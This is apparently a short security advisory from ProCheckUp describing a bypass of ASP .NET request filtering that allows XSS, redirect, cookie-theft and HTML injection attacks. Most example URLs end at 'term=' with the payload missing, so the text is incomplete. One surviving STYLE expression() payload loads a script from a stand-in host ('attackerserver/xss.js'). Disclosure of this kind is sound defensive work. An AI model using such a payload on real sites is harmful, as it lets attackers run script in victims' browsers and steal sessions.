By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET request filtering and perform XSS and HTML injection attacks.
It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application setup in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customer's live environments.

Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target/vuln-search.aspx?term=

Redirection Attack
http://target/vuln-search.aspx?term=

Cookie stealing
http://target/vuln-search.aspx?term=

Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=

• */STYLE=xss:expression(myScript.setAttribute("src","http://attackerserv

er/xss.js"))>